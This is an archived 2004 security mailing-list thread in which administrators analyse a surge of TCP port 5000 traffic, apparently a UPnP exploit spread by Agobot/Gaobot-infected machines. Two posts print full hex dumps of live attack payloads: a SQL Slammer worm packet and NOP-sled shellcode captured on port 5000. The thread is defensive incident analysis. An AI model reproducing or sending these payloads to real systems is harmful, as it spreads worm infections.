Security Incidents mailing list archives
RE: [Securityfocus-incidents] RE: TCP port 5000 syn increasing
From: "Remko Lodder" <remko () elvandar org>
Date: Tue, 18 May 2004 17:43:11 +0200
Take a look at the link posted by Frank Knobbe on Full-Disclosure: http://isc.sans.org/index.php?on=diary There is the info that you need ;-)

Cheers!

--
Kind regards,
Remko Lodder
Elvandar.org/DSINet.org
www.mostly-harmless.nl Dutch community for helping newcomers on the hacker scene
mrtg.grunn.org Dutch mirror of MRTG

-----Original message-----
From: securityfocus-incidents-bounces () lists elvandar org [mailto:securityfocus-incidents-bounces () lists elvandar org] On behalf of Steven Trewick
Sent: Tuesday 18 May 2004 17:06
To: 'Mike Barushok'; incidents () securityfocus com
Subject: [Securityfocus-incidents] RE: TCP port 5000 syn increasing

SQL Slammer lives on UDP port 1434, and it looks like this:

03/22-21:36:31.155369 211.99.223.42:1045 -> 192.168.0.88:1434
UDP TTL:105 TOS:0x0 ID:35759 IpLen:20 DgmLen:404
Len: 376
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE  ....B.........p.
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9  B.p.B........h..
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01  .B.....1...P..5.
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33  ...P..Qh.dllhel3
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B  2hkernQhounthick
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64  ChGetTf.llQh32.d
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66  hws2_f.etQhsockf
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45  .toQhsend....B.E
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50  .P..P.E.P.E.P..P
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05  ....B....=U..Qt.
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1  ....B....1.QQP..
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B  ..........Q.E.P.
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45  E.P..j.j.j...P.E
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61  .P.E.P........<a
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2  ...E...@........
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D  ...).......E.j..
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50  E.P1.Qf..x.Q.E.P
8B 45 AC 50 FF D6 EB CA                          .E.P....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Which is different from the capture in question (and also different from the capture on the site). I can only assume that the site referred to has made some kind of mistake in the title.

Since this traffic is TCP and directed towards port 5000, it is indeed most likely *either* some kind of exploit for a Universal Plug And Play (UPnP) service (since UPnP conducts all of its legitimate business using cleartext HTML, it certainly isn't legit traffic) *or* it's something else using port 5000. (Possible, since everyone in the world has realised what an awful crock UPnP is, and how insecure it is, and switched it off, haven't they? <g>)

I'd go with the assessment of a UPnP vuln, but that's because I have spent time hammering on UPnP services, and they suck an awful lot. Even so, that doesn't look long enough to overflow a buffer, since a typical UPnP packet is fairly long (maybe an overflow in header info fields, HTTP version number, etc.?).

Bear in mind however, that many, many SoHo WLAN and DSL modems/routers/etc. *also* use UPnP, oftentimes for remote administration (google this a bit and see the exploits roll in), so this may not represent an attack against a host, but a network device. (Although the NB scans tend to suggest otherwise.)
-----Original Message-----
From: Mike Barushok [mailto:barushok () keycreations com]
Sent: 17 May 2004 23:15
To: incidents () securityfocus com
Subject: Re: TCP port 5000 syn increasing

Exactly identical to the capture posted at:
http://www.linklogger.com/TCP5000_Overflow.htm
(That page has title: 'SQL Slammer Capture'.)

On Mon, 17 May 2004, Noel Cuillandre wrote:

> It's a buffer overflow attack on the plug and play service on TCP port 5000. The hexdump corresponds to a SQL Slammer-like worm.
>
> Noel Cuillandre
>
> Paul Schmehl wrote:
>
> > ----- Original Message -----
> > From: "ANDREW STREULE" <brother_wolf () btopenworld com>
> > To: <incidents () securityfocus com>
> > Sent: Monday, May 17, 2004 2:24 PM
> > Subject: Re: TCP port 5000 syn increasing
> >
> > > on my honeypot a port 5000 event is almost always followed by 1 or 2 nbt smb events.
> >
> > Here's a hexdump of what I'm seeing on 5000. The ones I'm seeing are coming from boxes infected with Agobot/Gaobot and not just 81.x.x.x.
> >
> > 00000000  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 00000010  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 00000020  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 00000030  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 00000040  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 00000050  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 00000060  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 00000070  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 00000080  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 00000090  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 000000A0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 000000B0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 000000C0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 000000D0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 000000E0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 000000F0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 00000100  90 90 90 90 90 90 90 90 90 90 90 90 4D 3F E3 77  ............M?.w
> > 00000110  90 90 90 90 FF 63 64 90 90 90 90 90 90 90 90 90  .....cd.........
> > 00000120  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> > 00000130  90 90 90 90 90 90 90 90 EB 10 5A 4A 33 C9 66 B9  ..........ZJ3.f.
> > 00000140  66 01 80 34 0A 99 E2 FA EB 05 E8 EB FF FF FF 70  f..4...........p
> > 00000150  99 98 99 99 C3 21 95 69 64 E6 12 99 12 E9 85 34  .....!.id......4
> > 00000160  12 D9 91 12 41 12 EA A5 9A 6A 12 EF E1 9A 6A 12  ....A....j....j.
> > 00000170  E7 B9 9A 62 12 D7 8D AA 74 CF CE C8 12 A6 9A 62  ...b....t......b
> > 00000180  12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A 5E 9D DC 7B  .k...j?.....^..{
> > 00000190  70 C0 C6 C7 12 54 12 DF BD 9A 5A 48 78 9A 58 AA  p....T....ZHx.X.
> > 000001A0  50 FF 12 91 12 DF 85 9A 5A 58 78 9B 9A 58 12 99  P.......ZXx..X..
> > 000001B0  9A 5A 12 63 12 6E 1A 5F 97 12 49 F3 9A C0 71 E5  .Z.c.n._..I...q.
> > 000001C0  99 99 99 1A 5F 94 CB CF 66 CE 65 C3 12 41 F3 9D  ...._...f.e..A..
> > 000001D0  C0 71 F0 99 99 99 C9 C9 C9 C9 F3 98 F3 9B 66 CE  .q............f.
> > 000001E0  69 12 41 5E 9E 9B 99 9E 24 AA 59 10 DE 9D F3 89  i.A^....$.Y.....
> > 000001F0  CE CA 66 CE 6D F3 98 CA 66 CE 61 C9 C9 CA 66 CE  ..f.m...f.a...f.
> > 00000200  65 1A 75 DD 12 6D AA 42 F3 89 C0 10 85 17 7B 62  e.u..m.B......{b
> > 00000210  10 DF A1 10 DF A5 10 DF D9 5E DF B5 98 98 99 99  .........^......
> > 00000220  14 DE 89 C9 CF CA CA CA F3 98 CA CA 5E DE A5 FA  ............^...
> > 00000230  F4 FD 99 14 DE A5 C9 CA 66 CE 7D C9 66 CE 71 AA  ........f.}.f.q.
> > 00000240  59 35 1C 59 EC 60 C8 CB CF CA 66 4B C3 C0 32 7B  Y5.Y.`....fK..2{
> > 00000250  77 AA 59 5A 71 62 67 66 66 DE FC ED C9 EB F6 FA  w.YZqbgff.......
> > 00000260  D8 FD FD EB FC EA EA 99 DA EB FC F8 ED FC C9 EB  ................
> > 00000270  F6 FA FC EA EA D8 99 DC E1 F0 ED C9 EB F6 FA FC  ................
> > 00000280  EA EA 99 D5 F6 F8 FD D5 F0 FB EB F8 EB E0 D8 99  ................
> > 00000290  EE EA AB C6 AA AB 99 CE CA D8 CA F6 FA F2 FC ED  ................
> > 000002A0  D8 99 FB F0 F7 FD 99 F5 F0 EA ED FC F7 99 F8 FA  ................
> > 000002B0  FA FC E9 ED 99 0D 0A 0D 0A                       .........
> >
> > Paul Schmehl (pauls () utdallas edu)
> > Adjunct Information Security Officer
> > The University of Texas at Dallas
> > AVIEN Founding Member
> > http://www.utdallas.edu/~pauls/

--
Mike Barushok
Senior Security Administrator
KeyCreations.com/KCISP.net/ispKansas.com

---
Incoming mail checked for known viruses
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.683 / Virus Database: 445 - Release Date: 12/05/04
The information contained in this e-mail is confidential and may be privileged; it is intended for the addressee only. If you have received this e-mail in error please delete it from your system. The statements and opinions expressed in this message are those of the author and do not necessarily reflect those of the company. Whilst Joplings Group operates an e-mail anti-virus program it does not accept responsibility for any damage whatsoever that is caused by viruses being passed. joplings.co.uk

_______________________________________________
Securityfocus-incidents mailing list
Securityfocus-incidents () lists elvandar org
http://lists.elvandar.org/mailman/listinfo/securityfocus-incidents
Current thread:
- RE: TCP port 5000 syn increasing, (continued)
- RE: TCP port 5000 syn increasing Frank Knobbe (May 18)
- Re: TCP port 5000 syn increasing Valdis . Kletnieks (May 18)
- Re: TCP port 5000 syn increasing Andreas (May 19)
- Re: TCP port 5000 syn increasing Harlan Carvey (May 19)
- Re: TCP port 5000 syn increasing Valdis . Kletnieks (May 19)
- Re: TCP port 5000 syn increasing Harlan Carvey (May 19)
- RE: TCP port 5000 syn increasing Nick FitzGerald (May 19)
- RE: TCP port 5000 syn increasing Nick FitzGerald (May 19)
- RE: TCP port 5000 syn increasing Paul Schmehl (May 19)
- RE: [Securityfocus-incidents] RE: TCP port 5000 syn increasing Remko Lodder (May 18)
- Re: TCP port 5000 syn increasing Bob (May 20)
- Re: TCP port 5000 syn increasing Valdis . Kletnieks (May 21)